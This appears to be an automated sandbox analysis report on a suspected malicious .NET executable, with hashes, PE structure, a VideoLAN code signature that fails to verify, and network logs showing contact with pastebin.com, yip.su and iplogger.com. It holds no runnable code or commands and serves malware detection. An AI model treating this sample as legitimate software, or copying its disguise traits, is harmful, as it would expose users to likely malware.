                                                SSDEEP:6144:mzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:oZHtBZWOKnMM6bFpZj4
                                                MD5:632899DC17D6A19101A805A6EA909154
                                                SHA1:961621A2727B0E8670B192B2D22967520D02C79F
                                                SHA-256:12FFB714E44F1EDFFF3B56F70029F5C1AD305297A7274BEA65B7B594E78399ED
                                                SHA-512:B527BA1A888E6E298612FA77264674630743396431417E630D2C447E6C86D3AB8AC10AAE55441B15AA960CB9EFCDAFAFF69367BD0FD3BC0A1E23DADDC63CB1A9
                                                Malicious:false
Preview:regf ... \AppCompat\Programs\Amcache.hve ...
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.968804538165683
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:file.exe
                                                File size:9'643'376 bytes
                                                MD5:a7f1b43bb75327181bf5535f6eab329d
                                                SHA1:b7d03ad2e90ea8f81ba755c6e5c551e2686c679c
                                                SHA256:79cf97a156358a7dfba188f7b6d516e62279a11fb15b828bbd676b15633c008e
                                                SHA512:5024b110c1bda506e2e07d285643791d2cfcd3fe4ade981b5d92306df0d4f7bf1061d36eb6feef36c8a058bc5990bff96f1011b2a0aa1701276c189b176fb4d6
                                                SSDEEP:196608:yt2OL8IgYaEYShQuM4PaZaCFO5lThlQcqsFDFP/4Qbp/xHKd3fc2obL:ycOL85ShLzPdcqVqsFJHXB9K3fcTbL
                                                TLSH:76A6331A95D80C6ED416D2BEC34026D39E9232415297E3C27E9D8BFE1FB29DB46CC385
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.J....................."........... ........@.. ....................... ............`................................
                                                Icon Hash:4e1616963371238e
                                                Entrypoint:0xd1c4fe
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x4A0655ED [Sun May 10 04:19:57 2009 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                Signature Valid:false
                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                Signature Validation Error:The digital signature of the object did not verify
                                                Error Number:-2146869232
                                                Not Before, Not After
                                                • 07/06/2024 02:00:00 09/06/2027 01:59:59
                                                Subject Chain
                                                • CN=VideoLAN, O=VideoLAN, L=Paris, C=FR
                                                Version:3
                                                Thumbprint MD5:E995C628AAD797E68CAE9D6374BC8ACE
                                                Thumbprint SHA-1:CCF8C4F9272D8A25477AF13EC71F97A3027C7319
                                                Thumbprint SHA-256:13D255CB1919425FC94170917F458E0CEC043372B844B95AA70C9E6B488E1909
                                                Serial:09D08EBDA06BE07C815EA7AF25EF6875
                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x91c4a4 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x91e000 | 0x11f52 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x92ca00 | 0x5b70 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x930000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x91a504 | 0x91a600 | 6e47b3687675ea870f59f777edd90d68 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x91e000 | 0x11f52 | 0x12000 | 5b2074da2c80f566d7550c481bce9965 | False | 0.8323296440972222 | data | 7.329922630205283 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x930000 | 0xc | 0x200 | 3926ca23ce0c8eecdfac90c478c10619 | False | 0.041015625 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x91e190 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.44133574007220217
RT_ICON | 0x91ea38 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | | | 0.30057803468208094
RT_ICON | 0x91efa0 | 0xd49e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9958478780084512
RT_ICON | 0x92c440 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.34221991701244814
RT_ICON | 0x92e9e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.37570356472795496
RT_ICON | 0x92fa90 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.524822695035461
RT_GROUP_ICON | 0x92fef8 | 0x5a | data | | | 0.7777777777777778
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Aug 9, 2024 23:01:29.205909967 CEST49735443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:01:29.205918074 CEST44349735172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:01:29.205944061 CEST44349735172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:01:29.205957890 CEST49735443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:01:29.205965042 CEST44349735172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:01:29.206012964 CEST49735443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:01:29.206655979 CEST44349735172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:01:29.248884916 CEST49735443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:01:29.248908997 CEST44349735172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:01:29.295766115 CEST49735443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:01:29.472121000 CEST44349735172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:01:29.472402096 CEST44349735172.67.188.178192.168.2.6
                                                Aug 9, 2024 23:01:29.472487926 CEST49735443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:01:29.472845078 CEST49735443192.168.2.6172.67.188.178
                                                Aug 9, 2024 23:01:29.577930927 CEST49737443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:29.577965021 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:29.582683086 CEST49737443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:29.582683086 CEST49737443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:29.582725048 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.138207912 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.150506973 CEST49737443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:30.150518894 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.341182947 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.341303110 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.341392040 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.341460943 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.341494083 CEST49737443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:30.341516972 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.341546059 CEST49737443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:30.341651917 CEST44349737172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:30.341818094 CEST49737443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:30.344521999 CEST49737443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:30.394396067 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:30.394437075 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:30.394527912 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:30.394735098 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:30.394741058 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:30.860182047 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:30.873194933 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:30.873209000 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078003883 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078118086 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078202963 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:31.078212976 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078242064 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078299999 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:31.078361988 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078540087 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078624964 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078632116 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:31.078649998 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078775883 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:31.078783989 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.078844070 CEST44349738188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:31.079006910 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:31.079158068 CEST49738443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:35.516829014 CEST49739443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:35.516855001 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:35.516930103 CEST49739443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:35.517335892 CEST49739443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:35.517349958 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:36.006444931 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:36.009080887 CEST49739443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:36.009099960 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:36.151344061 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:36.151375055 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:36.151398897 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:36.151416063 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:36.151470900 CEST44349739172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:36.151479959 CEST49739443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:36.151505947 CEST49739443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:36.151530981 CEST49739443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:36.152162075 CEST49739443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:36.180640936 CEST49740443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:36.180679083 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.180798054 CEST49740443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:36.181039095 CEST49740443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:36.181052923 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.661516905 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.675709963 CEST49740443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:36.675724030 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.787467957 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.787503004 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.787547112 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.787574053 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.787627935 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.787658930 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.787744045 CEST44349740188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:36.787755013 CEST49740443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:36.787755013 CEST49740443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:36.789832115 CEST49740443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:36.790777922 CEST49740443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:41.296988964 CEST49741443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:41.297008038 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.297122955 CEST49741443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:41.297450066 CEST49741443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:41.297462940 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.839065075 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.841507912 CEST49741443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:41.841523886 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.985264063 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.985400915 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.985493898 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.985557079 CEST49741443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:41.985569954 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.985615015 CEST49741443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:41.985620975 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.985750914 CEST44349741172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:41.985816956 CEST49741443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:41.986190081 CEST49741443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:42.010904074 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:42.010936975 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.011210918 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:42.011611938 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:42.011626005 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.499125004 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.508479118 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:42.508503914 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633027077 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633162022 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633219957 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:42.633232117 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633320093 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633414984 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633459091 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:42.633471966 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633519888 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:42.633528948 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633714914 CEST44349742188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:42.633775949 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:42.634080887 CEST49742443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:47.126025915 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:47.126053095 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.126396894 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:47.126753092 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:47.126764059 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.657671928 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.659442902 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:47.659452915 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.871463060 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.871606112 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.871697903 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.871776104 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:47.871784925 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.871814013 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.871891022 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:47.871932030 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.872000933 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:47.872009993 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.872055054 CEST44349743172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:47.872136116 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:47.872512102 CEST49743443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:48.240981102 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.241019964 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.241082907 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.241352081 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.241365910 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.699888945 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.701611042 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.701631069 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834393978 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834459066 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834495068 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834506035 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.834516048 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834554911 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.834561110 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834676027 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834708929 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834726095 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.834733009 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834769964 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.834775925 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834793091 CEST44349744188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:48.834839106 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:48.835093021 CEST49744443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:53.359860897 CEST49745443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:53.359900951 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:53.359991074 CEST49745443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:53.360536098 CEST49745443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:53.360552073 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.140505075 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.145987034 CEST49745443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:54.145994902 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.271761894 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.271898031 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.271961927 CEST49745443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:54.271970034 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.274032116 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.274096012 CEST49745443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:54.274101973 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.274233103 CEST44349745172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:54.274291039 CEST49745443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:54.274636030 CEST49745443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:54.292675018 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:54.292702913 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:54.292840958 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:54.293085098 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:54.293095112 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:54.762191057 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:54.763964891 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:54.763979912 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.008452892 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.008619070 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.008682013 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:55.008692980 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.008790016 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.008883953 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.008913994 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:55.008922100 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.009025097 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.009076118 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:55.009083986 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.009218931 CEST44349746188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:01:55.009272099 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:55.009573936 CEST49746443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:01:59.406830072 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:59.406919003 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:59.407162905 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:59.407593966 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:59.407632113 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:59.876869917 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:01:59.879887104 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:01:59.879951954 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.003840923 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.003987074 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.004064083 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.004362106 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:00.004427910 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.004533052 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:00.004960060 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.005218029 CEST44349747172.67.19.24192.168.2.6
                                                Aug 9, 2024 23:02:00.005292892 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:00.005681038 CEST49747443192.168.2.6172.67.19.24
                                                Aug 9, 2024 23:02:00.022212982 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.022249937 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.022346973 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.022583961 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.022592068 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.614370108 CEST44349748188.114.96.3192.168.2.6
                                                Aug 9, 2024 23:02:00.616087914 CEST49748443192.168.2.6188.114.96.3
                                                Aug 9, 2024 23:02:00.616105080 CEST44349748188.114.96.3192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 9, 2024 23:00:52.584353924 CEST | 63450 | 53 | 192.168.2.6 | 1.1.1.1
Aug 9, 2024 23:00:52.592073917 CEST | 53 | 63450 | 1.1.1.1 | 192.168.2.6
Aug 9, 2024 23:00:53.401336908 CEST | 63917 | 53 | 192.168.2.6 | 1.1.1.1
Aug 9, 2024 23:00:53.412178040 CEST | 53 | 63917 | 1.1.1.1 | 192.168.2.6
Aug 9, 2024 23:00:58.405965090 CEST | 60789 | 53 | 192.168.2.6 | 1.1.1.1
Aug 9, 2024 23:00:58.416543007 CEST | 53 | 60789 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 9, 2024 23:00:52.584353924 CEST | 192.168.2.6 | 1.1.1.1 | 0x2aaf | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Aug 9, 2024 23:00:53.401336908 CEST | 192.168.2.6 | 1.1.1.1 | 0x542f | Standard query (0) | yip.su | A (IP address) | IN (0x0001) | false
Aug 9, 2024 23:00:58.405965090 CEST | 192.168.2.6 | 1.1.1.1 | 0xe83d | Standard query (0) | iplogger.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 9, 2024 23:00:52.592073917 CEST | 1.1.1.1 | 192.168.2.6 | 0x2aaf | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
